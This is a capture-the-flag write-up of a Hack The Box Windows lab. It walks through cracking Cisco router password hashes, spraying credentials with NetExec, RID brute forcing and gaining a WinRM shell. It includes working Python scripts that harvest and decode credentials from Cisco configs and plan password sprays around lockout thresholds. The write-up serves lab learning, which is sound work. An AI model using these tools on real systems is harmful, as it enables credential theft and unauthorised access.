Pulling Off the Heist: A Methodical HTB Takedown
2026-3-3 06:12:24 Author: infosecwriteups.com (view original)

Jabaribrown


https://www.freepik.com/free-photo/hacker-breaking-into-computer-system-attacking-database-cybercrime-anonymous-woman-stealing-information-programming-online-malware-software-night-time-looking-camera_49250642.htm#fromView=keyword&page=1&position=2&uuid=f0f62f8e-b280-4e74-8ccc-0b7939560d21&query=Cyber+heist

To start, I launched Burp Suite Community Edition and navigated to the target IP address: 10.129.5.22. Upon visiting the site, I was presented with a login portal page that contained several hyperlinks available for further exploration.

[Image: login page]

First, I used Wappalyzer to identify the software and infrastructure powering the website. The results show Microsoft IIS on Windows Server, with PHP handling the server side. PHP is usually associated with a LAMP stack, but with IIS on Windows this is a Windows/IIS/PHP deployment rather than a Linux/Apache one, so the accounts and services we go after will be Windows ones.

[Image: wappalyzer ftw!]

Since I didn’t have a username or password at this point, I decided to attempt logging in as a guest. To my surprise, the login was successful and redirected me to an internal portal page that displayed a conversation between an administrator and a user.

[Image: looks like some juicy stuff]

At this point we can confidently say this is a Windows environment: the conversation indicates the user needs a domain account created in order to access shared files, which points at Windows file sharing and possibly an Active Directory domain. (NetExec will later report the machine's domain as SupportDesk, the same as its hostname, so the accounts we end up using are local accounts rather than domain accounts.)

Additionally, the user included an attachment containing what appears to be configuration details from a Cisco router set up by the previous administrator. That is definitely worth examining further, as configuration files often contain sensitive information such as credentials or internal network details.

[Image: ahh so usernames and passwords]

If you’re familiar with Cisco router configurations and working in the terminal, you’ll recognize these as the commands executed by the previous administrator. A few things immediately stood out to me:

  • The hostname: IOS-1
  • The configured minimum security password length of 12
  • A local router account being created
  • An admin account with a defined secret
  • SSH being enabled for remote access

Since SSH is enabled and local accounts are configured, that opens the possibility of authenticating directly to the router — assuming we can recover valid credentials.

After doing a bit of quick research (I haven’t touched a Cisco router since my studies at Gwinnett Technical College), I reviewed an article on Cisco password cracking that explains how certain password types are stored. The line:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

indicates that the router is using a Type 5 enable secret. Despite the "MD5" label, that is md5crypt (salted MD5 iterated 1,000 times, the same $1$ format as old Unix password files), which hashcat handles as mode 500. It is cheap by modern standards, so a rockyou-sized dictionary runs through it in seconds, and that makes hashcat the obvious tool for recovering the plaintext.

If successful, those credentials could potentially be reused for SSH access to the router — or even elsewhere in the environment, depending on password hygiene.

jbrown@Jabaris-MacBook-Pro heist % ../tools/hashcat/hashcat -m 500 hash.txt ../wordlist/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting

METAL API (Metal 368.52)
========================
* Device #01: Apple M2, skipped

OpenCL API (OpenCL 1.2 (Jul 20 2025 19:29:12)) - Platform #1 [Apple]
====================================================================
* Device #02: Apple M2, GPU, 2730/5461 MB (512 MB allocatable), 10MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 100c

Host memory allocated for this attack: 649 MB (964 MB free)

Dictionary cache built:
* Filename..: ../wordlist/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Speed.....: 464 MiB/s
* Runtime...: 0.29s

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91
Time.Started.....: Tue Feb 24 07:40:08 2026 (16 secs)
Time.Estimated...: Tue Feb 24 07:40:24 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (../wordlist/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 226.4 kH/s (34.00ms) @ Accel:128 Loops:1000 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3604480/14344384 (25.13%)
Rejected.........: 0/3604480 (0.00%)
Restore.Point....: 3276800/14344384 (22.84%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: texking0316 -> sp00fm00b
Hardware.Mon.SMC.: Fan0: 16%
Hardware.Mon.#02.: Util:100% Pwr:2279mW

Started: Tue Feb 24 07:39:46 2026
Stopped: Tue Feb 24 07:40:25 2026
jbrown@Jabaris-MacBook-Pro heist %

I was able to successfully crack the enable secret hash — the plaintext password is:

stealth1agent

With that in hand, the next step was to turn to the Type 7 passwords found in the configuration. Unlike Type 5, Type 7 is not a hash at all: it is a reversible XOR against a fixed key that ships in every IOS image (the two leading digits are the offset into that key), so it decodes instantly with a lookup or online tool. It exists only to keep a password from being read off a displayed config; treat any Type 7 string as plaintext.

I used the password cracker at:

👉 https://www.ifm.net.nz/cookbooks/passwordcracker.html

02375012182C1A1D751618034F36415408 = Q4)sJu\Y8qz*A3?d
0242114B0E143F015F5D1E161713 = $uperP@ssword
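Here is a Python implementation of what that online decoder does, added as a worked example for this write-up (it is not the author's code and not a Cisco tool). It also walks a config looking for credential lines, decoding Type 7 on the spot and flagging Type 5 for hashcat -m 500. The sample config is constructed: the hostname, minimum-length and credential values are the ones shown above, while the username values are assumptions, since the write-up only shows the encoded strings.

```python
"""Harvest credentials from a Cisco IOS running-config.

Type 7 ("service password-encryption") is not encryption: each byte is XORed
with a fixed key that ships in every IOS image, and the first two characters
of the stored string are the decimal offset into that key. Type 5
("enable secret 5 $1$...") is md5crypt and has to go to hashcat -m 500.
"""
import re

# The hard-coded IOS Type 7 key. It has been public for decades.
_XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Type 7 strings are two decimal seed digits followed by hex byte pairs.
_TYPE7_RE = re.compile(r"[0-9]{2}(?:[0-9A-Fa-f]{2})+")

# Constructed sample config. The hostname, min-length and the three credential
# values are the ones the write-up shows; the username values are assumptions,
# because the write-up only shows the encoded strings.
SAMPLE_CONFIG = """\
hostname IOS-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username router_user password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""


def type7_decode(encoded: str) -> str:
    """Decode a Type 7 string such as '0242114B0E143F015F5D1E161713'."""
    encoded = encoded.strip()
    if not _TYPE7_RE.fullmatch(encoded):
        raise ValueError(f"not a Type 7 string: {encoded!r}")
    seed = int(encoded[:2], 10)  # decimal offset into the key, not hex
    if seed >= len(_XLAT):
        raise ValueError(f"seed {seed} out of range")
    body = bytes.fromhex(encoded[2:])
    plain = bytes(c ^ _XLAT[(seed + i) % len(_XLAT)] for i, c in enumerate(body))
    return plain.decode("ascii")


def type7_encode(plaintext: str, seed: int = 2) -> str:
    """The inverse operation (XOR is symmetric); handy for confirming a decode."""
    data = plaintext.encode("ascii")
    body = (c ^ _XLAT[(seed + i) % len(_XLAT)] for i, c in enumerate(data))
    return f"{seed:02d}" + "".join(f"{b:02X}" for b in body)


# One credential per line: "<anything> password|secret|key <5|7> <value>".
_CRED_RE = re.compile(
    r"^(?P<prefix>.*?)\b(?:password|secret|key)\s+(?P<type>[57])\s+(?P<value>\S+)", re.M
)
_USER_RE = re.compile(r"\busername\s+(\S+)")


def harvest_config(config: str) -> list[dict]:
    """Return every Type 5 / Type 7 credential in the config: Type 7 decoded,
    Type 5 left as a hash together with the hashcat mode it needs."""
    records = []
    for m in _CRED_RE.finditer(config):
        user = _USER_RE.search(m["prefix"])
        rec = {
            "user": user.group(1) if user else "enable",
            "type": int(m["type"]),
            "value": m["value"],
        }
        if rec["type"] == 7:
            rec["plaintext"] = type7_decode(rec["value"])
        else:
            rec["plaintext"] = None
            rec["crack_with"] = "hashcat -m 500"
        records.append(rec)
    return records


if __name__ == "__main__":
    for rec in harvest_config(SAMPLE_CONFIG):
        print(rec)
```

Run it as-is to print the records for the sample, or pass a real running-config to harvest_config(). On the defensive side the only fix is to stop using Type 7: configure local accounts with `username ... secret` (Type 5 at minimum, Type 8 or 9 where the platform supports them) and treat every Type 7 string in a leaked config as a plaintext disclosure.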

With credentials in hand, the next logical step was to enumerate the target and confirm which services are exposed.

I started with a SYN scan combined with service/version detection, the default scripts and OS fingerprinting (-sS and -O need raw sockets, hence sudo):

sudo nmap -sC -sS -sV -O -T4 10.129.5.22

This:

  • Scans the default top 1,000 TCP ports (not all of them; the "Not shown: 996 filtered tcp ports" line confirms it, and -p- would be needed to cover all 65,535)
  • Runs the default NSE script set (-sC)
  • Identifies service versions (-sV)
  • Fingerprints the operating system (-O)
jbrown@Jabaris-MacBook-Pro heist % sudo nmap -sC -sS -sV -O -T4 10.129.5.22
Password:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-24 08:16 -0500
Nmap scan report for 10.129.5.22
Host is up (0.085s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-02-24T13:16:46
|_ start_date: N/A
|_clock-skew: -43s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.16 seconds
jbrown@Jabaris-MacBook-Pro heist %

A few things stood out from the Nmap results.

First, as we already knew, port 80 is the IIS web server hosting the login portal. Nmap also flags the TRACE method as enabled and the PHPSESSID cookie without the HttpOnly flag; neither leads anywhere here, but both belong in a report.

More interestingly:

  • Port 445 (SMB) is open
  • Port 5985 (WinRM) is open

SMB is the one to look at first. The smb2-security-mode script reports message signing enabled but not required. Signing binds an SMB session to the authentication that created it; when it is not required, NTLM authentication captured or coerced from another host can be relayed to this one (the classic NTLM relay scenario, which needs a second victim and does not apply from our single-host position). It has no bearing on whether anonymous or guest sessions are permitted, so that still has to be tested directly, which was the next step.

jbrown@Jabaris-MacBook-Pro heist % smbutil view -G  //10.129.5.22/ 
Password for 10.129.5.22:
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist % smbutil view -G //10.129.5.22/
Password for 10.129.5.22:
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist %
jbrown@Jabaris-MacBook-Pro heist % smbutil view -a -N //10.129.5.22/
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist % smbutil view -a //10.129.5.22
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist % smbutil view --help
view: illegal option -- -
usage: smbutil view [connection options] //[domain;][user[:password]@]server
where options are:
-A authorize only
-N don't prompt for a password
-G allow guest access
-g authorize with guest only
-a authorize with anonymous only
-f don't share session
jbrown@Jabaris-MacBook-Pro heist %

Since anonymous/guest access to SMB didn’t work, the next logical step was to try authenticated access using the credentials we recovered.

Instead of manually testing each combination, I leveraged NetExec, the successor to CrackMapExec (https://www.netexec.wiki/). This tool makes credential spraying and service validation extremely efficient in Windows environments.

From the conversation in the portal, we had two candidate usernames, admin and Hazard, to which I added the built-in Administrator; those went into a users file, with the recovered password(s) in passwords.txt.

Using NetExec, I attempted authentication against SMB on port 445 with every combination:

jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u users -p passwords.txt
SMB 10.129.5.22 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.5.22 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.5.22 445 SUPPORTDESK [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.5.22 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
jbrown@Jabaris-MacBook-Pro heist %

Now that we’ve confirmed valid credentials, it’s time to move into share enumeration.

Using NetExec, we can quickly list available SMB shares with our authenticated user:

jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --shares
SMB 10.129.5.22 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.5.22 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.5.22 445 SUPPORTDESK [*] Enumerated shares
SMB 10.129.5.22 445 SUPPORTDESK Share Permissions Remark
SMB 10.129.5.22 445 SUPPORTDESK ----- ----------- ------
SMB 10.129.5.22 445 SUPPORTDESK ADMIN$ Remote Admin
SMB 10.129.5.22 445 SUPPORTDESK C$ Default share
SMB 10.129.5.22 445 SUPPORTDESK IPC$ READ Remote IPC
jbrown@Jabaris-MacBook-Pro heist %
jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --spider C$   
SMB 10.129.5.22 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.5.22 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.5.22 445 SUPPORTDESK [*] Spidering .
jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --spider ADMIN$
SMB 10.129.5.22 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.5.22 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.5.22 445 SUPPORTDESK [*] Spidering .
jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --spider IPC$
SMB 10.129.5.22 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.5.22 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.5.22 445 SUPPORTDESK [*] Spidering .
jbrown@Jabaris-MacBook-Pro heist %

Share enumeration didn't reveal anything immediately useful, so the next logical move is to pivot to WinRM on port 5985.

Since we already have valid credentials, testing WinRM access makes sense — especially in a Windows environment where remote management is commonly enabled for administrators or power users.

To attempt authentication, I used Evil-WinRM:

jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.5.22 -u hazard -p stealth1agent
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\>

Although I was able to establish a connection to the WinRM service, attempting to execute commands resulted in a 401 Unauthorized error.


That’s a strong indicator that while the credentials are valid, the user account does not have permission to execute commands over WinRM. In Windows environments, WinRM access typically requires membership in either:

  • The Administrators group
  • The Remote Management Users group

Since authentication succeeds but command execution fails, it suggests the credentials we harvested are valid for network authentication (like SMB), but the account is not part of the Remote Management Users group — and likely not a local administrator either.

*Evil-WinRM* PS C:\> dir

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1
jbrown@Jabaris-MacBook-Pro evil-winrm %

Although WinRM execution is blocked, valid SMB authentication gives us another powerful enumeration vector: RID brute forcing.

Every account and group has a SID built from the issuing authority's SID (the domain SID on a domain controller, the machine SID on a standalone host) plus a Relative Identifier. RIDs are handed out sequentially: well-known values such as 500 (Administrator) and 501 (Guest), then 1000 and up for accounts created later. The LSA lookup call (LsarLookupSids, reached over the SMB named pipes) will translate SIDs to names for any authenticated user, so we can ask for <SID>-500, <SID>-501, and so on up to a few thousand and get back every account that exists, without any special privilege.

Using NetExec, we can perform RID brute forcing like this:

jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u hazard -p stealth1agent --rid-brute 
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.129.96.157 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)
jbrown@Jabaris-MacBook-Pro evil-winrm %

The RID brute force paid off. Note the authority on every line is SUPPORTDESK, the hostname, so these are local SAM accounts rather than domain users; that makes no difference for what comes next. Whenever enumeration gives you more identities, the next move is simple: test authentication with the passwords we already hold.

jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Administrator -p passwords.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:passwords.txt STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Administrator -p Q4)sJu\Y8qz*A3?d
zsh: parse error near `)'
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Administrator -p "Q4)sJu\Y8qz*A3?d"
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u support -p "Q4)sJu\Y8qz*A3?d"
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Chase -p "Q4)sJu\Y8qz*A3?d"
jbrown@Jabaris-MacBook-Pro evil-winrm %
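The parsing and ordering below is an added Python example, not the author's tooling and not part of NetExec. It reads the --rid-brute lines printed above, separates users from groups, drops the built-in accounts that Windows disables by default, and emits a password-major spray order. It also reproduces NetExec's rule for -p (an existing file is a wordlist, anything else is a literal password), which is what turned the first attempt above into a spray of the string "passwords.txt". The sample input is a copy of the output shown above; the password list in the __main__ block is the two values recovered from the router config.

```python
"""Turn NetExec --rid-brute output into a password-spray plan.

Every account has a SID of the form <authority SID>-<RID>. On a domain
controller the authority is the domain SID; on a standalone host (this box:
the "domain" NetExec reports, SupportDesk, is just the hostname) it is the
machine SID and the accounts live in the local SAM. LsarLookupSids resolves
SID ranges for any authenticated user, which is why low-privilege SMB
credentials are enough to enumerate everyone.
"""
import os
import re

# The lines NetExec printed in the write-up, copied here as the sample input.
RID_BRUTE_OUTPUT = r"""
SMB 10.129.96.157 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.129.96.157 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)
"""

_RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<authority>[^\\\s]+)\\(?P<name>\S+)\s+\((?P<kind>SidType\w+)\)"
)

# Built-in accounts that are disabled by default on Windows 10 / Server 2019
# (Guest, DefaultAccount, WDAGUtilityAccount): not worth a spray attempt.
DEFAULT_DISABLED_RIDS = frozenset({501, 503, 504})


def parse_rid_brute(text: str) -> tuple[list[dict], list[dict]]:
    """Split the output into (users, groups); each record has rid, authority, name."""
    users, groups = [], []
    for m in _RID_LINE.finditer(text):
        rec = {"rid": int(m["rid"]), "authority": m["authority"], "name": m["name"]}
        (users if m["kind"] == "SidTypeUser" else groups).append(rec)
    return users, groups


def spray_plan(users: list[dict], passwords: list[str],
               skip_rids: frozenset = DEFAULT_DISABLED_RIDS) -> list[tuple[str, str]]:
    """Password-major order: every account is tried with password 1 before any
    account sees password 2, so each password adds exactly one bad-password
    count per account and a lockout threshold is approached evenly instead of
    being burned on a single user."""
    names = [u["name"] for u in users if u["rid"] not in skip_rids]
    return [(name, pw) for pw in passwords for name in names]


def passwords_from_arg(arg: str) -> list[str]:
    """Mirror NetExec's rule for -p: a path that exists is read as a wordlist,
    anything else is sprayed as the literal password. The write-up hit this by
    running from a directory without passwords.txt, so the literal string
    "passwords.txt" was sprayed."""
    if os.path.isfile(arg):
        with open(arg, encoding="utf-8", errors="replace") as fh:
            return [line.rstrip("\r\n") for line in fh if line.strip()]
    return [arg]


if __name__ == "__main__":
    users, groups = parse_rid_brute(RID_BRUTE_OUTPUT)
    print("users:", [u["name"] for u in users], "groups:", [g["name"] for g in groups])
    for name, pw in spray_plan(users, ["stealth1agent", r"Q4)sJu\Y8qz*A3?d"]):
        print(f"try {users[0]['authority']}\\{name}:{pw}")
```

The plan is what you would feed to NetExec as a users file plus a passwords file; the point of generating it yourself is to see the attempt count per account before you start, since a real environment will have a lockout threshold that this lab does not.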

The account that matters is the last one tried: Chase with the first Type 7 password (the transcript above lost the [+] line, but the WinRM session below confirms it). Two footguns from the failed attempts are worth noting. The first command was run from the evil-winrm directory, where passwords.txt does not exist, so NetExec sprayed the literal string passwords.txt, which is exactly what the output shows; if a wordlist name shows up verbatim as a password, check the path. And an unquoted password containing ) breaks zsh parsing, so quote it.

Since port 5985 is open, the next check is whether Chase has WinRM access, again using Evil-WinRM with the newly validated credentials:

jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.96.157  -u Chase  -p "Q4)sJu\Y8qz*A3?d"
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\Chase\Documents>

/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\Chase\Documents> dir
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> dir

Directory: C:\Users\Chase

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/22/2019 7:14 AM 3D Objects
d-r--- 4/22/2019 7:14 AM Contacts
d-r--- 4/22/2019 6:10 PM Desktop
d-r--- 4/22/2019 6:13 PM Documents
d-r--- 2/18/2021 4:03 PM Downloads
d-r--- 4/22/2019 7:14 AM Favorites
d-r--- 4/22/2019 7:14 AM Links
d-r--- 4/22/2019 7:14 AM Music
d-r--- 4/22/2019 7:14 AM Pictures
d-r--- 4/22/2019 7:14 AM Saved Games
d-r--- 4/22/2019 7:14 AM Searches
d-r--- 4/22/2019 7:14 AM Videos

*Evil-WinRM* PS C:\Users\Chase> cd Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

Directory: C:\Users\Chase\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 2/25/2026 5:54 AM 34 user.txt

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
***USERFLAGFOUNDHERE*****
*Evil-WinRM* PS C:\Users\Chase\Desktop>

Now for our favorite part — Windows Privilege Escalation — time to go get that admin flag:

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload ~/HTB/tools/PEASS-ng/winPEAS/winPEASps1/winPEAS.ps1

Info: Uploading /Users/jbrown/HTB/tools/PEASS-ng/winPEAS/winPEASps1/winPEAS.ps1 to C:\Users\Chase\Desktop\winPEAS.ps1
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...

Data: 125744 bytes of 125744 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> ./winPEAS.ps1

While running winPEAS, one of the findings shows that the Administrator account is currently logged onto the machine:

=========|| Additonal Winlogon Credentials Check
.
Administrator

Although logging in directly as Administrator failed, there are a couple of files on the current user's desktop, one of which lists a few tasks:

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

Directory: C:\Users\Chase\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 2/25/2026 5:54 AM 34 user.txt
-a---- 2/25/2026 6:30 AM 94310 winPEAS.ps1

*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\Desktop>

That note ("Fix the router config"), together with the Firefox processes found below, suggests the Administrator has been working on the router issue through a browser, presumably the same support portal.

We can verify what’s actually running on the machine by checking active processes.

*Evil-WinRM* PS C:\Users\Chase\Documents\sharphound-v2.9.0> Get-Process | Where-Object {$_.CPU -gt 0} | Select-Object ProcessName, CPU, Id

ProcessName CPU Id
----------- --- --
dllhost 0.0625 6872
firefox 0.140625 1196
firefox 8.078125 6544
firefox 0.140625 6664
firefox 1.53125 6772
firefox 0.390625 7048
wsmprovhost 1.5625 2912

Since Firefox is running (and winPEAS reported an Administrator logon), its memory becomes interesting: whatever the browser submitted to the portal, including the login form, may still be sitting in it.

